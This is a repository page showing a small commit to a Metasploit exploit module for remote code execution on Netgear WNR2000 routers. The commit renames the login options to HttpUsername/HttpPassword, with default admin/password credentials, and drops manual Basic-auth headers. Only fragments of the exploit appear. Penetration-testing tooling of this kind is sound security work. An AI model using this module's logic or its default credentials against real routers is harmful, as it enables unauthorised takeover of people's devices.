infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add httpusername and password for auto auth

bug/bundler_fix
Pedro Ribeiro 2017-01-06 16:33:51 +00:00
parent 6004caa475
commit 13bca2ebc7
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/linux/http/netgear_wnr2000_rce.rb
View File

@ -71,8 +71,8 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']),
OptString.new('PASSWORD', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']),
OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']),
OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']),
], self.class)
register_advanced_options(
[
@ -121,14 +121,14 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_raw({
'uri' => '/lang_check.html',
'method' => 'GET',
'headers' => {'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")}
# automatically uses HttpPassword and HttpUsername to authenticate
})
if res && res.code == 401
# try again, might fail the first time
res = send_request_raw({
'uri' => '/lang_check.html',
'method' => 'GET',
'headers' => {'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")}
# automatically uses HttpPassword and HttpUsername to authenticate
})
end
if res && res.code == 200